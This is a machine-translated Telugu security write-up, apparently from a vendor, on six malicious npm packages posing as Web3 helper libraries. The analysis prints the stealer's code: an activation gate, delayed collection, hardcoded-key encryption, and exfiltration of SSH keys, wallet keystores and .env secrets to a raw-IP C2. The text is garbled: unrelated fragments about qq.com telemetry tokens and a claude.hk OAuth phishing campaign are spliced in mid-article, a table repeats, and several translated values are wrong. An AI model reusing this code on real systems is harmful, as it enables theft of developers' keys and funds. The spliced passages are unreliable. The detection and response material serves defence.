TL; DR
మే 6, 2026న, ఒకే ఒక్క npm పబ్లిషర్, namikazesarada010206Ethereum, Solidity, మరియు DeFi డెవలపర్ ఎకోసిస్టమ్ను లక్ష్యంగా చేసుకుని ఆరు హానికరమైన ప్యాకేజీలను చొప్పించారు.
ప్యాకేజీలు, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsమరియు web3-utils-core, జనాదరణ పొందిన Web3 టూలింగ్ కోసం సహాయక లైబ్రరీల వలె కనిపించేలా రూపొందించిన నమ్మశక్యమైన పేర్లను ఉపయోగించారు.
ఆరు ప్యాకేజీలలోనూ ఒకే రకమైనవి ఉన్నాయి telemetry.js ఫైల్. ఆ ఫైల్ క్లస్టర్ అంతటా SHA-256తో బైట్ పరంగా ఒకేలా ఉంది:
మాల్వేర్ ఇన్స్టాల్ సమయంలో అమలు కాదు. అక్కడ ఏమీ లేదు preinstall or postinstall హుక్. దానికి బదులుగా, ప్యాకేజీని ఇంపోర్ట్ చేసినప్పుడు ఇది యాక్టివేట్ అవుతుంది require().
ఆ వివరానికి ప్రాముఖ్యత ఉంది.
ఒక డెవలపర్ ప్యాకేజీని వాస్తవంగా ఉపయోగించే వరకు ఇంప్లాంట్ వేచి ఉంటుంది. ఆ తర్వాత, వర్క్స్టేషన్ నిజమైన Ethereum / Solidity డెవలప్మెంట్ ఎన్విరాన్మెంట్ లాగా ఉందో లేదో అది తనిఖీ చేస్తుంది. అది Alchemy లేదా Infura కీలు, ప్రైవేట్ కీలు, నిమోనిక్స్, డిప్లాయర్ కీలు, లేదా స్థానిక Foundry డైరెక్టరీ కోసం వెతుకుతుంది.
హోస్ట్ సరిపోలితే, స్టీలర్ SSH ప్రైవేట్ కీలు, ఫౌండ్రీ / గెత్ / బ్రౌనీ వాలెట్ కీస్టోర్లను సేకరిస్తుంది, .env* ఫైళ్లు మరియు సున్నితమైన ఎన్విరాన్మెంట్ వేరియబుల్స్. ఇది హార్డ్కోడెడ్ పాస్ఫ్రేజ్ను ఉపయోగించి AES-256-GCMతో బండిల్ను ఎన్క్రిప్ట్ చేస్తుంది మరియు TLS వెరిఫికేషన్ డిసేబుల్ చేయబడిన రా IPv4 C2 ఎండ్పాయింట్కు దానిని బయటకు పంపుతుంది.
Xygeni యొక్క మాల్వేర్ ఎర్లీ వార్నింగ్ (MEW) సిస్టమ్ ఆరు ప్యాకేజీలన్నింటినీ హానికరమైనవిగా నిర్ధారించింది. npm రిజిస్ట్రీ టేక్డౌన్ రిపోర్ట్ బండిల్ పెండింగ్లో ఉంది.
ది క్లస్టర్: ఆరు ప్యాకేజీలు, ఒక ప్రచురణకర్త
ప్రచురణకర్త ఖాతా namikazesarada010206 ధృవీకరించని Gmail చిరునామాకు లింక్ చేయబడింది namikazesarada010206@gmail.com.
ఈ ప్రచారం మే 6, 2026న ఒకే రోజు ప్రచురణగా వెలువడింది. ఆరు ప్యాకేజీలన్నీ ఈ విధంగా వెర్షన్ చేయబడ్డాయి. 1.0.0, ఎటువంటి రన్టైమ్ డిపెండెన్సీలను కలిగి లేదు మరియు కేవలం మూడు ఫైళ్లను మాత్రమే పంపింది:
package.json index.js telemetry.js వారు కూడా అదే సోర్స్ రిపోజిటరీని ప్రకటించారు:
https://github.com/harunosakura030303-maker/evmchain-config మొదటి ప్రచురణలోనే మొదటి మూడు ప్యాకేజీలు MEW స్కానర్ల ద్వారా పట్టుబడ్డాయి. ప్రచురణకర్త యొక్క npm ప్రొఫైల్ను విశ్లేషకులు సమీక్షించిన తర్వాత మిగిలిన మూడు బలవంతంగా ఫ్లాగ్ చేయబడ్డాయి. ఒకే బైట్-ఐడెంటికల్ telemetry.js క్లస్టర్ అంతటా నిర్ధారించబడినప్పటికీ, స్థిరత్వం ఆధారంగా వాటిని హానికరమైనవిగా మూసివేశారు.
| ప్యాకేజీ | వెర్షన్ | npm ప్రచురించింది | MEW టికెట్ | తీర్పు |
|---|---|---|---|---|
| వియమ్-కోర్ | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | హానికరమైన |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | హానికరమైన |
| హార్డ్హాట్-కోర్-యుటిల్స్ | 1.0.0 | 2026-05-06 | #51051 | హానికరమైన |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | దురుద్దేశపూరితమైన, స్థిరత్వం ద్వారా |
| ఫౌండ్రీ-యుటిల్స్ | 1.0.0 | 2026-05-06 | #51071 | దురుద్దేశపూరితమైన, స్థిరత్వం ద్వారా |
| వెబ్3-యుటిల్స్-కోర్ | 1.0.0 | 2026-05-06 | #51070 | దురుద్దేశపూరితమైన, స్థిరత్వం ద్వారా |
పేరు పెట్టే వ్యూహం సూటిగా ఉన్నా ప్రభావవంతంగా ఉంది.
ఈ ప్యాకేజీలు ఖచ్చితమైన అప్స్ట్రీమ్ పేర్లను అనుకరించవు. బదులుగా, అవి ఈ క్రింది విధంగా నమ్మశక్యమైన “యుటిలిటీ” సఫిక్స్లను ఉపయోగిస్తాయి. -core, -utilsమరియు -utils-coreఅందువల్ల అవి, ఒక డెవలపర్ వెబ్3 టూలింగ్ దగ్గర చూడాలని ఆశించే అనుబంధ లైబ్రరీల వలె కనిపిస్తాయి.
| హానికరమైన ప్యాకేజీ | చట్టబద్ధమైన లక్ష్యం |
|---|---|
| వియమ్-కోర్ | viem, ఒక ప్రసిద్ధ Ethereum TypeScript క్లయింట్ |
| viem-utils-core | వియెమ్ |
| హార్డ్హాట్-కోర్-యుటిల్స్ | హార్డ్హాట్, ఒక ప్రధాన స్రవంతి సాలిడిటీ డెవలప్మెంట్ ఎన్విరాన్మెంట్ |
| evm-utils | జెనరిక్ EVM టూలింగ్ నేమ్స్పేస్ |
| ఫౌండ్రీ-యుటిల్స్ | ఫౌండ్రీ, ఒక సాలిడిటీ టూల్చెయిన్ |
| వెబ్3-యుటిల్స్-కోర్ | వెబ్3-యుటిల్స్, వెబ్3.js సహాయకాలు |
ఇది “అనుబంధ ప్యాకేజీ” నమూనా: “నేనే అసలైన ప్యాకేజీని” అని కాదు, కానీ “నేను అసలైన ప్యాకేజీ చుట్టూ ఒక సహేతుకమైన సహాయకుడిలా కనిపిస్తాను.”
వేగంగా అభివృద్ధి చెందుతున్న డీఫై డెవలపర్లకు, ప్రమాదాన్ని సృష్టించడానికి అది చాలు.
ప్యాకేజీని దిగుమతి చేసినప్పుడు ఏమి జరుగుతుంది
ఈ దాడి గొలుసు చిన్నది, ఉద్దేశపూర్వకమైనది మరియు క్రిప్టో-డెవలప్మెంట్ పరిసరాలపై కేంద్రీకృతమై ఉంది.
ఇన్స్టాలేషన్ హుక్ లేదు. దానికి బదులుగా, ప్రతి ప్యాకేజీలో ఒక index.js అది స్టబ్ ఫంక్షనాలిటీని ఎగుమతి చేసి, ఆపై హానికరమైన టెలిమెట్రీ మాడ్యూల్ను లోడ్ చేస్తుంది.
require('./telemetry').init(); దీని అర్థం మాల్వేర్ మొదటిసారి ఇంపోర్ట్ చేసినప్పుడే యాక్టివేట్ అవుతుంది.
అది దాడి చేసేవారికి కార్యాచరణపరంగా ఉపయోగపడుతుంది. చాలా స్కానర్లు మరియు శాండ్బాక్స్లు ఇన్స్టాల్-సమయ ప్రవర్తనపై దృష్టి పెడతాయి. ఈ ప్యాకేజీ ఒక డెవలపర్, బిల్డ్ స్క్రిప్ట్, టెస్ట్ సూట్ లేదా రన్టైమ్ పాత్ ద్వారా వాస్తవంగా ఉపయోగించబడే వరకు వేచి ఉంటుంది.
యాక్టివేషన్ గేట్: నిజమైన వెబ్3 డెవలపర్ వర్క్స్టేషన్లలో మాత్రమే పనిచేస్తుంది
ఇంప్లాంట్లో అత్యంత ముఖ్యమైన భాగం యాక్టివేషన్ గేట్.
ఈ మాల్వేర్, Ethereum / Solidity డెవలపర్ మెషీన్లలో సాధారణంగా కనిపించే ఎన్విరాన్మెంట్ వేరియబుల్స్ను తనిఖీ చేస్తుంది:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); ఇది ఫౌండ్రీ ఇన్స్టాల్ చేయబడి ఉందో లేదో కూడా తనిఖీ చేస్తుంది:
fs.existsSync(path.join(os.homedir(), '.foundry')) రెండు షరతులలో ఏదీ నిజం కాకపోతే, ఫంక్షన్ ఏమీ చేయకుండా తిరిగి వస్తుంది.
అది సాధారణ విశ్లేషణ వాతావరణాలలో ప్యాకేజీని నిశ్శబ్దంగా ఉంచుతుంది. ఫౌండ్రీ, ఆల్కెమీ కీలు, ఇన్ఫ్యూరా కీలు, ప్రైవేట్ కీలు లేదా నిమోనిక్స్ లేని శాండ్బాక్స్, హానిచేయనిదిగా కనిపించే ఇంపోర్ట్ను గుర్తించవచ్చు.
సరిపోలిన హోస్ట్లో, మాల్వేర్ సేకరణకు ముందు 60 నుండి 90 సెకన్ల వరకు వేచి ఉంటుంది:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ఈ ఆలస్యం దిగుమతి మరియు తరలింపు మధ్య ఉన్న స్పష్టమైన సంబంధాన్ని తగ్గిస్తుంది. .unref() ప్యాకేజీని స్వల్పకాలిక స్క్రిప్ట్లో ఇంపోర్ట్ చేసినట్లయితే, ఈ కాల్ హోస్ట్ ప్రాసెస్ సాధారణంగా నిష్క్రమించడానికి కూడా అనుమతిస్తుంది.
ఇది శబ్దం చేస్తూ చేసే అడ్డదిడ్డమైన దొంగతనం కాదు. డెవలపర్ ఎన్విరాన్మెంట్ దొంగిలించడానికి యోగ్యమైనది అయితే తప్ప పనిచేయకుండా ఉండేలా రూపొందించబడిన ఒక లక్షిత దొంగతనం ఇది.
దొంగ ఏమి సేకరిస్తాడు
యాక్టివేషన్ గేట్ దాటిన తర్వాత, మాల్వేర్ వెబ్3 డెవలప్మెంట్లో అత్యంత ముఖ్యమైన మూలాల నుండి సమాచారాన్ని సేకరిస్తుంది: ప్రైవేట్ కీలు, వాలెట్ కీస్టోర్లు, డిప్లాయ్మెంట్ క్రెడెన్షియల్స్, క్లౌడ్ సీక్రెట్స్, npm టోకెన్లు మరియు స్థానిక ప్రాజెక్ట్ కాన్ఫిగరేషన్.
| మూల | ఏమి సేకరించబడింది |
|---|---|
| process.env | /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i కి సరిపోలే ఏదైనా వేరియబుల్ |
| ~/.ssh/* | PRIVATE KEY లేదా BEGIN OPENSSH ఉన్న ఫైల్లు, పూర్తి ఫైల్ కంటెంట్తో సహా |
| ~/.foundry/keystores/* | ఫౌండ్రీ వాలెట్ కీస్టోర్ ఫైల్స్ |
| ~/.ethereum/keystore/* | గెత్ వాలెట్ కీస్టోర్ ఫైల్స్ |
| ~/.బ్రౌనీ/అకౌంట్స్/* | బ్రౌనీ వాలెట్ కీస్టోర్ ఫైల్స్ |
| ${cwd}/.env | పూర్తి ఫైల్ కంటెంట్ |
| ${cwd}/.env.local | పూర్తి ఫైల్ కంటెంట్ |
| ${cwd}/.env.production | పూర్తి ఫైల్ కంటెంట్ |
| ${cwd}/.env.development | పూర్తి ఫైల్ కంటెంట్ |
| os.hostname() | హోస్ట్ మెటాడేటా |
| crypto.randomUUID() | బాధితుడు/సెషన్ గుర్తింపుదారుడు |
| Date.now() | సేకరణ టైమ్స్టాంప్ |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA టోకెన్లు ఇవి:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 ఆ టెలిమెట్రీ ఆపరేటర్ యొక్క సొంత విశ్లేషణలా లేక విడిగా డబ్బు సంపాదించే ఛానెలా అనేది మేము నిర్ధారించలేకపోయాము. మేము పరిశీలించిన రెండు నమూనాలలోనూ ATTA టోకెన్లు ఒకే విధంగా ఉన్నాయి.
క్లస్టర్ బి: హెయిబాయి
claude.hk OAuth ఫిషింగ్ + ANTHROPIC_BASE_URL హైజాక్
ఏప్రిల్ 1 నమూనా అనేది ఈ ప్రచారంలో తొలిదశకు చెందిన ముడి నమూనా.
heibai:2.1.88-claude.hk-4 ప్రచురించింది wuguoqiangvip28జూన్ 7, 2025న సృష్టించబడిన ఖాతా. ఈ ప్యాకేజీ చట్టబద్ధమైన దానితో పోల్చి స్పష్టంగా వెర్షన్ చేయబడింది. 2.1.88 మానవ ప్రేరిత విడుదల.
ఇది CA-సర్టిఫికెట్ MITM గురించి పట్టించుకోదు. దానికి బదులుగా, ఇది OAuth ఎండ్పాయింట్ గురించి వినియోగదారునికి అబద్ధం చెబుతుంది.
లీక్ అయిన క్లాడ్ కోడ్ సోర్స్కు జోడించిన హానికరమైన అంశాలు ఇవి:
| మూల | ఏమి సేకరించబడింది |
|---|---|
| process.env | /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i కి సరిపోలే ఏదైనా వేరియబుల్ |
| ~/.ssh/* | PRIVATE KEY లేదా BEGIN OPENSSH ఉన్న ఫైల్లు, పూర్తి ఫైల్ కంటెంట్తో సహా |
| ~/.foundry/keystores/* | ఫౌండ్రీ వాలెట్ కీస్టోర్ ఫైల్స్ |
| ~/.ethereum/keystore/* | గెత్ వాలెట్ కీస్టోర్ ఫైల్స్ |
| ~/.బ్రౌనీ/అకౌంట్స్/* | బ్రౌనీ వాలెట్ కీస్టోర్ ఫైల్స్ |
| ${cwd}/.env | పూర్తి ఫైల్ కంటెంట్ |
| ${cwd}/.env.local | పూర్తి ఫైల్ కంటెంట్ |
| ${cwd}/.env.production | పూర్తి ఫైల్ కంటెంట్ |
| ${cwd}/.env.development | పూర్తి ఫైల్ కంటెంట్ |
| os.hostname() | హోస్ట్ మెటాడేటా |
| crypto.randomUUID() | బాధితుడు/సెషన్ గుర్తింపుదారుడు |
| Date.now() | సేకరణ టైమ్స్టాంప్ |
లక్ష్యాల జాబితా చాలా నిర్దిష్టమైనది. ఇది సాధారణ బ్రౌజర్ దొంగతనం లేదా విస్తృత క్రెడెన్షియల్ స్క్రాపింగ్ కాదు. ఇది Ethereum అప్లికేషన్లను నిర్మించే, పరీక్షించే, అమలుచేసే లేదా నిర్వహించే డెవలపర్లను లక్ష్యంగా చేసుకుంది.
ఫౌండ్రీ, గెత్ మరియు బ్రౌనీ కీస్టోర్లను చేర్చడం చాలా ముఖ్యం. ఈ ఫైళ్లు వాలెట్లకు లేదా డిప్లాయ్మెంట్ ఐడెంటిటీలకు ప్రత్యక్ష ప్రాప్యతను సూచించగలవు. దాడి చేసేవారు వీటిని పాస్వర్డ్లు, నిమోనిక్స్ లేదా ఎన్విరాన్మెంట్ సీక్రెట్లతో జత చేయగలిగితే, వారు నిధులను తరలించడం, డిప్లాయర్ల వలె నటించడం లేదా స్మార్ట్ కాంట్రాక్ట్ కార్యకలాపాలను దెబ్బతీయడం వంటివి చేయగలరు.
బహిర్గతం చేయడానికి ముందు ఎన్క్రిప్షన్
మాల్వేర్ సేకరించిన డేటాను బయటకు పంపే ముందు ఎన్క్రిప్ట్ చేస్తుంది.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); హార్డ్కోడ్ చేయబడిన పాస్ఫ్రేజ్:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d తుది పేలోడ్ JSON రూపంలో ఉంటుంది:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} ఎన్క్రిప్షన్ చేయడం వల్ల మాల్వేర్ దానంతట అదే మరింత అధునాతనంగా మారదు. అయితే, అది నెట్వర్క్ తనిఖీని కష్టతరం చేస్తుంది. ఎగ్రెస్ను గమనిస్తున్న డిఫెండర్ ఒక JSON పేలోడ్ను చూడగలడు, కానీ దొంగిలించబడిన కీలు, వాలెట్ ఫైళ్లు లేదా ఇతర సమాచారాన్ని చూడలేడు. .env హార్డ్కోడ్ చేయబడిన పాస్ఫ్రేజ్ మరియు డీక్రిప్షన్ లాజిక్ లేని కంటెంట్లు.
రా IPv4 C2 కి ఎక్స్ఫిల్ట్రేషన్
బహిష్కరణ మార్గం హార్డ్కోడ్ చేయబడింది:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); మాల్వేర్ వీరికి డేటాను పంపుతుంది:
https://76.13.37.80:8443/api/v1/telemetry రెండు వివరాలు ప్రత్యేకంగా కనిపిస్తాయి.
మొదటగా, C2 అనేది ఒక డొమైన్ కాకుండా ఒక రా IPv4 చిరునామా. దానివల్ల డొమైన్ రిజిస్ట్రేషన్ అవసరం ఉండదు మరియు కొన్ని డొమైన్ ఆధారిత గుర్తింపులను నివారించవచ్చు.
రెండవది, TLS ధృవీకరణ దీనితో నిలిపివేయబడింది:
rejectUnauthorized: false అది మాల్వేర్ను సెల్ఫ్-సైన్డ్ సర్టిఫికేట్లతో సహా ఏ సర్టిఫికేట్నైనా అంగీకరించేలా చేస్తుంది. మరో మాటలో చెప్పాలంటే, దాడి చేసేవాడు చెల్లుబాటు అయ్యే పబ్లిక్ సర్టిఫికేట్ అవసరం లేకుండానే ఎన్క్రిప్టెడ్ ట్రాన్స్పోర్ట్ను పొందుతాడు.
తిరిగి ప్రయత్నించే లాజిక్ గానీ, ఫాల్బ్యాక్ హోస్ట్ గానీ లేదు. లోపాలు నిశ్శబ్దంగా కప్పివేయబడతాయి. దీనివల్ల, C2 ఆఫ్లైన్లో ఉన్నా లేదా అందుబాటులో లేకపోయినా ప్యాకేజీ నిశ్శబ్దంగా ఉంటుంది.
ఈ ప్రచారం ఎందుకు ముఖ్యమైనది
డెవలపర్లను లక్ష్యంగా చేసుకున్న చాలా హానికరమైన npm ప్యాకేజీలు npm టోకెన్లు, AWS కీలు, GitHub టోకెన్లు లేదా వంటి విస్తృతమైన ఆధారాలను పొందడానికి ప్రయత్నిస్తాయి. .npmrc ఫైళ్లు.
ఈ ప్రచారం లక్ష్యాన్ని పరిమితం చేస్తుంది.
ఇది ఆ మెషిన్ ఒక Ethereum లేదా Solidity డెవలపర్కు చెందినదని సూచించే సంకేతాల కోసం చూస్తుంది. ఆ తర్వాత అది ఆ ఎన్విరాన్మెంట్లో ముఖ్యమైన అసెట్స్ను మాత్రమే తీసుకుంటుంది: వాలెట్ కీస్టోర్లు, ప్రైవేట్ కీలు, నిమోనిక్స్, డిప్లాయర్ కీలు. .env ఫైళ్లు, మరియు SSH కీలు.
అది ఆ క్యాంపెయిన్ను ఒక సాధారణ npm స్టీలర్ కంటే Web3 టీమ్లకు మరింత ప్రమాదకరంగా చేస్తుంది.
విజయవంతమైన సంక్రమణ ఈ క్రింది వాటిని బహిర్గతం చేయగలదు:
- విస్తరణ వాలెట్లు
- స్మార్ట్ కాంట్రాక్ట్ అడ్మిన్ కీలు
- RPC ప్రొవైడర్ కీలు
- క్లౌడ్ విస్తరణ ఆధారాలు
- npm పబ్లిషింగ్ టోకెన్లు
- డెవలపర్ లేదా బిల్డ్ ఇన్ఫ్రాస్ట్రక్చర్కు SSH యాక్సెస్
- ప్రాజెక్ట్ రహస్యాలు నిల్వ చేయబడ్డాయి
.envఫైళ్లు - ఫౌండ్రీ, గెత్, లేదా బ్రౌనీ కోసం వాలెట్ కీస్టోర్లు
ప్యాకేజీ పేర్లు కూడా స్పష్టమైన సోషల్ ఇంజనీరింగ్ను చూపిస్తున్నాయి. వారు సుపరిచితమైన టూల్ పేర్ల ద్వారా వెబ్3 డెవలపర్ ఎకోసిస్టమ్ను లక్ష్యంగా చేసుకుంటున్నారు: viem, hardhat, foundry, evmమరియు web3.
నటుడు అసలు ప్రాజెక్టుల విషయంలో రాజీ పడాల్సిన అవసరం లేదు. వారికి కావలసిందల్లా, సహేతుకంగా కనిపించే ఒక అనుబంధ ప్యాకేజీని ఇన్స్టాల్ చేయడానికి ఒక డెవలపర్ మాత్రమే.
రాజీ మరియు గుర్తింపు సూచికలు
| ప్యాకేజీలు మరియు ప్రచురణకర్త | |
|---|---|
| ఫీల్డ్ | విలువ |
| npm ప్రచురణకర్త | నమికాజెసరదా010206 |
| ప్రచురణకర్త ఇమెయిల్ | namikazesarada010206@gmail.com |
| ఇమెయిల్ ధృవీకరించబడింది | తోబుట్టువుల |
| SCM తనిఖీ | తోబుట్టువుల |
| కీర్తి స్కోరు | 1.0 |
| ప్యాకేజీలు | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core |
| సంస్కరణలు | అన్ని 1.0.0 |
| మూల రిపోజిటరీ | https://github.com/harunosakura030303-maker/evmchain-config |
| హానికరమైనదిగా నిర్ధారించబడింది | మొత్తం ఆరు ప్యాకేజీలు |
| నెట్వర్క్ | |
|---|---|
| రకం | విలువ |
| C2 ఎండ్పాయింట్ | https://76.13.37.80:8443/api/v1/telemetry |
| సి2 ఐపి | 76.13.37.80 |
| C2 పోర్ట్ | 8443/tcp |
| TLS ప్రవర్తన | అనధికారిక తిరస్కరణ: తప్పు |
| పేలోడ్ స్కీమా | {"v":2,"iv": "డి": ,"t": } |
| ఫైల్స్ మరియు హాష్లు | |
|---|---|
| రకం | విలువ |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| ప్యాకేజీ లేఅవుట్ | package.json, index.js, telemetry.js |
| ఫైల్ గణన | 3 |
| సుమారు మొత్తం పరిమాణం | 3.4 KB |
యాక్టివేషన్ సిగ్నల్స్
మాల్వేర్ ఈ ఎన్విరాన్మెంట్ వేరియబుల్స్ను తనిఖీ చేస్తుంది:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY ఇది వీటిని కూడా తనిఖీ చేస్తుంది:
~/.foundry/ లక్షిత హోస్ట్ మార్గాలు
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development సేకరణ రెగెక్స్
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i గుర్తింపు గమనికలు
పూర్తి ప్రవర్తనా విశ్లేషణ అవసరం లేకుండానే అనేక నియమాలు ఈ ప్రచారాన్ని పట్టుకుంటాయి.
మొదట, ఆరు హానికరమైన ప్యాకేజీ పేర్ల కోసం లాక్ఫైల్లను స్కాన్ చేయండి:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ఏదైనా మ్యాచ్లో package-lock.json, yarn.lock, pnpm-lock.yamlలేదా node_modules గతాన్ని ఒక తీవ్రమైన సంఘటనగా పరిగణించాలి.
రెండవది, వాలెట్ కీస్టోర్ మార్గాలను చదివే Node.js ప్రాసెస్లను పర్యవేక్షించండి:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ సహాయక డిపెండెన్సీగా ఇంపోర్ట్ చేయబడిన ప్యాకేజీకి ఇది అరుదుగా చట్టబద్ధమైన ప్రవర్తన. దీని తర్వాత బయటి నెట్వర్క్ కార్యకలాపాలు జరిగినప్పుడు ఇది మరింత అనుమానాస్పదంగా ఉంటుంది.
మూడవదిగా, ఈ క్రింది వాటికి HTTPS కనెక్షన్లను నిరోధించండి లేదా హెచ్చరించండి:
76.13.37.80:8443 ముఖ్యంగా అభ్యర్థన మార్గం ఇలా ఉన్నప్పుడు:
/api/v1/telemetry నాలుగవది, ఈ లక్షణాలను కలిపి ఉన్న npm ప్యాకేజీల కోసం వెతకండి:
- కొత్త లేదా తక్కువ ఖ్యాతి ఉన్న ప్రచురణకర్త
- ధృవీకరించని Gmail ఖాతా
- వెబ్3-సంబంధిత ప్యాకేజీ పేరు
- అర్థవంతమైన రిపోజిటరీ చరిత్ర లేదు
- చిన్న ప్యాకేజీ లేఅవుట్
index.jsఅది టెలిమెట్రీ లేదా సహాయక ఫైల్ను లోడ్ చేస్తుంది- రన్టైమ్ డిపెండెన్సీలు లేవు
- సున్నితమైన పర్యావరణ-చరరాశి సేకరణ
- వాలెట్ కీస్టోర్ యాక్సెస్
ఒకే IOC కంటే ఈ నమూనా మరింత ఉపయోగకరమైనది, ఎందుకంటే తదుపరి ప్యాకేజీ IP చిరునామాను మార్చవచ్చు కానీ అదే టార్గెటింగ్ లాజిక్ను కొనసాగిస్తుంది.
రాజీ ప్రతిస్పందన చెక్లిస్ట్
ఒకవేళ డెవలపర్ ఆరు ప్యాకేజీలలో ఒకదాన్ని ఉపయోగించి, వారి ఎన్విరాన్మెంట్ యాక్టివేషన్ గేట్తో సరిపోలితే, ఆ వర్క్స్టేషన్ను రాజీపడినట్లుగా పరిగణించండి.
అందులో ఫౌండ్రీ ఇన్స్టాల్ చేయబడిన మెషీన్లు, ఎన్విరాన్మెంట్లో ఆల్కెమీ లేదా ఇన్ఫ్యూరా కీలు, ప్రైవేట్ కీలు, నిమోనిక్స్ లేదా డిప్లాయర్ కీలు ఉంటాయి.
సిఫార్సు చేయబడిన ప్రతిస్పందన:
- హోస్ట్ను నెట్వర్క్ నుండి డిస్కనెక్ట్ చేయండి.
- ప్రిజర్వ్
node_modules, లాక్ఫైల్స్, షెల్ హిస్టరీ, మరియు ఫోరెన్సిక్స్ కోసం సంబంధిత లాగ్లు. - ప్రతి SSH కీజతను కింద తిప్పండి
~/.ssh/. - ప్రతి కీస్టోర్ కింద వాలెట్ కీలను తిప్పండి
~/.foundry,~/.ethereumమరియు~/.brownie. - నిధులను కొత్త వాలెట్లకు తరలించండి.
- నిల్వ చేయబడిన ప్రతి రహస్యాన్ని తిప్పండి
.env*డెవలపర్ పనిచేసిన రిపోజిటరీలలోని ఫైల్స్. - కలెక్షన్ రెగెక్స్కు సరిపోలే ఎన్విరాన్మెంట్ సీక్రెట్లను రొటేట్ చేయండి, వీటిలో AWS కీలు, npm టోకెన్లు, డిప్లాయ్ టోకెన్లు, API కీలు, ప్రైవేట్ కీలు, సీడ్లు మరియు నిమోనిక్లు ఉంటాయి.
- ప్యాకేజీని మొదటిసారి ఇన్స్టాల్ చేసినప్పటి నుండి క్లౌడ్, npm, GitHub, RPC ప్రొవైడర్ మరియు బ్లాక్చెయిన్ కార్యకలాపాలను ఆడిట్ చేయండి.
- తిరిగి ఉపయోగించే ముందు వర్క్స్టేషన్ను రీ-ఇమేజ్ చేయండి.
రక్షక క్రీడాకారులు ఏమి గ్రహించాలి
అధిక విలువ కలిగిన డెవలపర్ ఎకోసిస్టమ్ల చుట్టూ npm టైపోస్క్వాటింగ్ ఎలా పరిణామం చెందుతోందో ఈ ప్రచారం చూపిస్తుంది.
ఆ యాక్టర్కు నిలకడ అవసరం లేదు. వారికి అస్పష్టత అవసరం లేదు. వారికి ఇన్స్టాల్-టైమ్ ఎగ్జిక్యూషన్ కూడా అవసరం లేదు.
దానికి బదులుగా, వారు మూడు విషయాలపై ఆధారపడ్డారు:
- ఆమోదయోగ్యమైన వెబ్3 ప్యాకేజీ పేర్లు
- నిజమైన క్రిప్టో-డెవలప్మెంట్ మెషీన్లలో మాత్రమే యాక్టివేషన్
- Ethereum డెవలపర్లకు అత్యంత ముఖ్యమైన ఫైళ్లు మరియు రహస్యాలను నేరుగా దొంగిలించడం
అందువల్ల, విస్తృత పరిశీలనలో ఈ ప్రచారాన్ని గుర్తించడం సులభం కాదు మరియు సరైన వాతావరణంలోకి ప్రవేశించినప్పుడు ఇది ప్రమాదకరంగా మారుతుంది.
Web3 బృందాలకు గుణపాఠం స్పష్టంగా ఉంది: డిపెండెన్సీ పేర్లను మీ ముప్పు నమూనాలో భాగంగా పరిగణించండి. హానిచేయని సహాయక ప్యాకేజీలా కనిపించేది కూడా, మీ వాలెట్కు నష్టం కలిగించడానికి అతి తక్కువ మార్గంగా మారగలదు.
npm రిజిస్ట్రీకి నివేదించబడింది. పబ్లిషర్ ఖాతా మరియు ప్యాకేజీలు తొలగించబడినప్పుడు మేము ఈ పోస్ట్ను అప్డేట్ చేస్తాము.




